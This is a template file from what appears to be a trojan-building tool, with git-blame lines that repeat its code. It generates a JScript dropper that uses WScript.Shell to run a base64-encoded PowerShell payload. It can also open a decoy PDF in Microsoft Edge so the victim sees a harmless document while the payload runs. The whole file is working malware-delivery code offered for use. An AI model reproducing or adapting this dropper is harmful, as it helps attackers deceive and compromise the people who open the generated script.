trojantool/cmd/jscript.gojs

var base64EncodedBinary = "{{.Encoded}}";

var shell = new ActiveXObject("WScript.Shell");
var command = "powershell.exe -encodedcommand " + base64EncodedBinary;
shell.Run(command, 1, true);

{{if len .EncodedDecoy}}
var dataUri = "data:application/pdf;base64,{{.EncodedDecoy}}";

var shell = new ActiveXObject("Shell.Application");
shell.ShellExecute("msedge.exe", dataUri, "", "open", 1);

{{end}}

{{/* vim: syntax=javascript */}}
slightly reworked html template 2023-08-30 08:57:28 +02:00			`var base64EncodedBinary = "{{.Encoded}}";`
started adding JScript option 2023-08-10 21:42:41 +02:00
			`var shell = new ActiveXObject("WScript.Shell");`
slightly reworked html template 2023-08-30 08:57:28 +02:00			`var command = "powershell.exe -encodedcommand " + base64EncodedBinary;`
			`shell.Run(command, 1, true);`
started adding JScript option 2023-08-10 21:42:41 +02:00
JScript should work now 2023-08-10 21:53:50 +02:00			`{{if len .EncodedDecoy}}`
slightly reworked html template 2023-08-30 08:57:28 +02:00			`var dataUri = "data:application/pdf;base64,{{.EncodedDecoy}}";`
started adding JScript option 2023-08-10 21:42:41 +02:00
slightly reworked html template 2023-08-30 08:57:28 +02:00			`var shell = new ActiveXObject("Shell.Application");`
			`shell.ShellExecute("msedge.exe", dataUri, "", "open", 1);`
started adding JScript option 2023-08-10 21:42:41 +02:00
JScript should work now 2023-08-10 21:53:50 +02:00			`{{end}}`

			`{{/* vim: syntax=javascript */}}`